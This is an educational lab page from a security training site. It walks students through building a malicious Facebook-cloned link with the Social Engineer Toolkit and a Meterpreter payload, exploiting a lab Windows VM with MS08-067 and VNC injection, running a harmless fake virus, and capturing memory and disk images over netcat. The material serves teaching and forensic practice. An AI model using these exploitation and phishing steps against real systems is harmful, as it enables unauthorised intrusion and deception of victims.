ComputerSecurityStudent (CSS) [Login] [Join Now]




|UNIX >> BackTrack >> BackTrack 5 R1 >> Current Page |Views: 31924

(Social Engineering Toolkit (SET): Lesson 3)

{ Create Malicious Weblink, Install Virus, Capture Forensic Images }


Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
    • It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.

     

  • Lab Notes
    • In this lab we will do the following:
      1. Use Set to Create a Malicious Web Link
      2. Create an addition VNC Session
      3. Install a Fake Virus
      4. Capture a Forensics Memory and Hard Disk Image.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.

     

Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set

     

  2. Website Attack Vector
    • Instructions:
      1. Select 2

     

  3. Select Metasploit Browser Attack Method
    • Instructions:
      1. Select 2

     

  4. Select Web Templates
    • Instructions:
      1. Select 1

     

  5. Set Facebook Web Attack
    • Instructions:
      1. Select 4

     

  6. Enter Exploit
    • Instructions:
      1. 24) Metasploit Browser Autopwn (USE AT OWN RISK!)

     

  7. Set Payload
    • Instructions:
      1. Select 2) Windows Reverse_TCP Meterpreter
      2. Use Port 5555

     

  8. Exploits Prepared, Server Started
    • Instructions:
      1. Your are looking for the "--- Done, Found" before you Continue.
      2. Continue to next Section.

     

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Image how an attacker could embed the malicious link, created in previous Section, in an email to a possible victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Booting up WindowsVulerable01
    • Instructions:
      1. Start up VMware Player
      2. Select WindowsVulerable01
      3. Edit Virtual Machine

     

  2. Configuring the Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Select Bridged Connection
      3. Select OK

     

  3. Play WindowVulnerable01
    • Instructions:
      1. Select Play virtual Machine

     

  4. WindowsVulerable01 Authentication
    • Instructions:
      1. Login as administrator

 

Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer

     

  2. Victim Clicks on Link
    • Instructions:
      1. Place the Malicious Web Link in the Address Bar.
        • In my case, http://192.168.1.105:8080
        • In your case, get the IP address from Section 4, Step 8.
    • Note:
      • The Web Browser will just crash.

 

Section 7. Entering the Victim's Machine
  1. Record Victim's IP Address
    • Instructions:
      1. Record the Victim's IP Address.
      2. Look for the line that starts with Session ID 1 (See Below).

     

  2. Create VNC Session to Victim's machine
    • Instructions:
      1. Press <Enter>
      2. use windows/smb/ms08_067_netapi
      3. set PAYLOAD windows/vncinject/bind_tcp
      4. set RHOST 192.168.1.109
        • Note: This is the IP Address obtained in the previous step.
      5. exploit

     

  3. Viewing the Victim's Machine over VNC
    • Instructions:
      1. Now you have a VNC connection to the Victim's Machine.
      2. Pretty KooL right!!!
    • Proof of Lab Instructions #1:
      1. Click in the Metasploit Courtesy Shell
      2. date, press enter twice
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • i.e., echo "John Gray"
      4. PrtScn
      5. Paste into a word document
      6. Continue to Next Step

     

  4. Bring Up Internet Explorer
    • Instructions:
      1. Start --> Internet Explorer

     

  5. Download Fake Virus.
    • Instructions:
      1. Place the following link into the address bar.
        • http://www.computersecuritystudent.com/UNIX/BACKTRACK/BACKTRACK5R1/lesson6/fake_virus.bat
      2. Press Enter
      3. Click Save
      4. Continue to Next Step

     

  6. Save the Fake Virus.
    • Instructions:
      1. Navigate to "C:\tools\Virus Jar"
        • Create this directory if it does not already exist.
      2. Click Save

     

  7. Run the Fake Virus.
    • Instructions:
      1. Click the Run Button

     

  8. Viewing Results
    • Instructions:
      1. You will now see some messages stating your system was compromised.
        • Note, this is just a batch script that prints messages to a screen.
        • This was just an example of what an attacker could do once they compromised the victim's machine.
      2. Click on the Black Box and Press Enter.

     

  9. Delete the fake_virus.bat file
    • Instructions:
      1. Start --> My Computer
      2. Navigate to "C:\tools\Virus Jar"
      3. Right Click on fake_virus.bat
      4. Click Delete
      5. Send to Recycle Bin? Yes

     

  10. Delete the fake_virus.bat file for the Recycle Bin
    • Instructions:
      1. Navigate to the Recycle Bin
      2. Right Click on fake_virus.bat
      3. Click Delete
      4. Are you sure want to delete 'fake_virus.bat'? Yes
    • Notes:
      • We are completly removing this file, so we have a deleted file to both analyze and recover with preceding forensic labs.

 

Section 8. Start Up NetCat  Listener To Receive Physical Memory Dump From Helix
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

     

  3. Start Up Netcat on BackTrack
    • Instructions:
      1. mkdir -p /FORENSICS/images/1/
      2. cd /FORENSICS/images/1/
      3. nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd
        • Netcat will listen for Helix to send the Memory Image.
        • Nothing will be sent until you complete the following section.
      4. Continue to Next Section

 

Section 9. Start Helix to Send Physical Memory to BackTrack
  1. Edit Virtual Machine Settings
    • Instructions:
      1. Virtual Machine --> Virtual Machine Settings...

     

  2. Configure Windows to load the Helix iso as a CD/DVD
    • Instructions
      1. Select CD/DVD (IDE)
      2. Select the Use ISO image file
      3. Browse to where you saved the Helix iso.
        • Note:  In my case, I save it in the following location:
        • H:\BOOT ISO\Helix2008R1.iso

     

  3. Helix Screen
    • Instructions
      1. Select Accept

     

  4. Live Acquisition
    • Instructions
      1. Click on the Camera Icon.
      2. Select "\\PhysicalMemory" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire

     

  5. Notice
    • Instructions
      1. Click Yes

     

  6. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will say "Copying Physical memory"
      3. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

 

Section 10. Verify Physical Memory Dump on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01_PM_fake_virus.dd

 

Section 11. Start Up NetCat  Listener To Receive Hard Drive Image From Helix
  1. Start Up Netcat on BackTrack
    • Instructions:
      1. cd /FORENSICS/images/1/
      2. nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd
        • Netcat will listen for Helix to send the Hard Drive Image.
        • Nothing will be sent until you complete the following section.
      3. Continue to Next Section

 

Section 12. Use Helix to Send Hard Disk Image to BackTrack
  1. Live Acquisition
    • Instructions:
      1. Click on the Camera Icon.
      2. Select "C:\ (Logical drive)" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire

     

  2. Notice
    • Instructions
      1. Click Yes

     

  3. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will saying "Copying \\.\C to CONOUT$..."
      3. This 8GB copy will take about 30 minutes.
      4. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

 

Section 13. Verify Hard Drive Image on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01*
      2. date
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • i.e., echo "John Gray"
    • Proof of Lab Instructions #2:
      1. PrtScn
      2. Paste into the previously created word document

     

Section 14. Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. Proof of Lab Instructions #1 (See Section 7, Step 3)
      2. Proof of Lab Instructions #2 (See Section 13, Step 1)
      3. Submit to Moodle.

     



Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth